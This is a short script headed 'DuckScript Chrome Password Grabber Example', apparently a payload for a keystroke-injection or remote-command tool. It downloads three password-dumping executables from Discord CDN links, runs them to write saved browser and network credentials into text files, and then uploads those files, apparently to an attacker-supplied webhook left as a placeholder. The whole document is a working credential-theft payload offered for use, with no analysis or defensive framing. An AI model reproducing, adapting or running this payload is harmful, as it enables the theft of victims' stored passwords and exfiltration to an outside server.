# DuckScript Chrome Password Grabber Example
# Author: Zebratic
# Date: 10/12/2020

"/updatesettings" "username" "%USERNAME%"
"/updatesettings" "webhook" "INSERT_WEBHOOK_HERE"

"ChromePass.exe" "https://cdn.discordapp.com/attachments/741745322300145674/784001116349923339/ChromePass.exe" "/stext %HERAX%\ChromePass.exe.txt"
"NetPass.exe" "https://cdn.discordapp.com/attachments/741745322300145674/784001117054042112/netpass.exe" "/stext %HERAX%\NetPass.exe.txt"
"WebBrowserPassView.exe" "https://cdn.discordapp.com/attachments/741745322300145674/784001113820889088/WebBrowserPassView.exe" "/stext %HERAX%\WebBrowserPassView.exe.txt"

"/sleep" "5000" ""

"/getfile" "%HERAX%\ChromePass.exe.txt" ""
"/getfile" "%HERAX%\NetPass.exe.txt" ""
"/getfile" "%HERAX%\WebBrowserPassView.exe.txt" ""
